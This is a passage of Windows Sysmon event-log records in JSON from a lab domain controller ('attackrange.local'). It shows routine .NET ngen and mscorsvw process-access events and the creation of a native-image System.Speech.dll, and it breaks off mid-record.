{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:50.147\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001051980F00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:50.147","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001051980F00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:50.365\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-229A-5F25-0000-0010000F1000}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:50.365","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-229A-5F25-0000-0010000F1000}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:50.365\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-229A-5F25-0000-0010000F1000}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:50.365","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-229A-5F25-0000-0010000F1000}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:50.381\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-229A-5F25-0000-0010000F1000}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:50.381","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-229A-5F25-0000-0010000F1000}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:51.568\r\nProcessGuid: {41C8662E-229A-5F25-0000-0010000F1000}\r\nProcessId: 672\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2a0-0\\System.Speech.dll\r\nCreationUtcTime: 2020-08-01 08:06:51.568","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:51.568","ProcessGuid":"{41C8662E-229A-5F25-0000-0010000F1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2a0-0\\System.Speech.dll","CreationUtcTime":"2020-08-01 08:06:51.568","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:51.631\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001047A10F00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:51.631","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001047A10F00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:51.631\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001047A10F00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:51.631","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001047A10F00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:51.631\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001047A10F00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:51.631","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001047A10F00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:51.818\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-229B-5F25-0000-00105B171000}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 